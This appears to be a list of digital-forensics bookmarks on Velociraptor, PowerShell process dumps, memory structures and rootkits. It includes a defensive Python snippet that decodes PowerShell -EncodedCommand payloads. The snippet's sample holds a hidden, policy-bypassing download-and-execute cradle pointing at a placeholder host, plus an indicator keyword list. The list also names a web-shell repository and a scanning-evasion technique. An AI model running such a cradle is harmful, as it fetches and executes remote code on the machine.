Welcome :: Velociraptor - Digging deeper!
Book 3
Velociraptor Training :: Velociraptor - Digging deeper!
GitHub - TheBinitGhimire/Web-Shells: Some of the best web shells that you might need!
Some of the best web shells that you might need!
Lee Holmes | Extracting Forensic Script Content from PowerShell Process Dumps
After posting Extracting Activity History from PowerShell Process Dumps, I got an interesting follow up question: “Is it possible to extract the content of scripts (from disk) that were executed, even if those files were not captured?” The answer is “Yes”, but it’s also complicated. And to make it even more complicated, we’re going to go down a path showing how to do some of this detective work from scratch. This is going to require a lot of WinDbg automation, so for a first step, install the WinDbg module.
gargoyle, a memory scanning evasion technique
The Blog of Josh Lospinoso
Pulling Back the Curtains on EncodedCommand PowerShell Attacks
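The entry above is title-only. As an added example (not code from the linked article or from this list's author), the following Python shows the one fact a responder needs for these attacks: the -EncodedCommand payload is base64 over UTF-16LE, so a plain base64 decode yields NUL-interleaved bytes. The command line, the switch spellings matched and the indicator list are constructed assumptions for illustration, not the article's own ruleset.

```python
import base64
import re

# Assumption: these switch spellings cover the abbreviations seen in practice
# (powershell.exe accepts any unambiguous prefix of -EncodedCommand).
ENC_SWITCH = re.compile(
    r"(?i)(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)"
)

# Assumption: a short, illustrative indicator list, not an exhaustive ruleset.
INDICATORS = (
    "invoke-expression", "iex", "downloadstring", "net.webclient",
    "frombase64string", "-nop", "hidden", "bypass",
)


def encode_command(script: str) -> str:
    """Build the blob the way PowerShell expects it: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> str:
    """Reverse -EncodedCommand: base64 -> UTF-16LE.
    Re-pads a blob whose trailing '=' was stripped in a log."""
    blob = blob.strip()
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-16-le")


def analyze_command_line(cmdline: str) -> dict:
    """Find an encoded-command switch, decode its payload, flag indicators.
    Returns {"decoded": str | None, "indicators": [str, ...]}."""
    m = ENC_SWITCH.search(cmdline)
    if m is None:
        return {"decoded": None, "indicators": []}
    try:
        decoded = decode_encoded_command(m.group(1))
    except (ValueError, UnicodeDecodeError):
        # Malformed base64 or odd byte count: still worth a look, but not decodable.
        return {"decoded": None, "indicators": ["undecodable payload"]}
    haystack = (cmdline + " " + decoded).lower()
    hits = [ind for ind in INDICATORS if ind in haystack]
    return {"decoded": decoded, "indicators": hits}


if __name__ == "__main__":
    # Constructed sample command line in the shape these attacks typically take.
    script = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
    sample = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + encode_command(script)
    print(analyze_command_line(sample))
```

Run it over process-creation command lines (Sysmon Event ID 1, Security 4688 with command-line auditing); the decoded text, not the blob, is what you search for the download cradle.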
GitHub - msuhanov/winmem_decompress: Extract compressed memory pages from page-aligned data
Extract compressed memory pages from page-aligned data.
Terminus Project - Changes in Memory Structures by OS version
Terminus Project by ReWolf: a diff of NTDLL structures across Windows versions, from Windows XP up to Windows 10.
Naming Files, Paths, and Namespaces (Windows)
All file systems supported by Windows use the concept of files and directories to access data stored on a disk or device.
Some Observations on Rootkits - Microsoft Malware Protection Center - Site Home - TechNet Blogs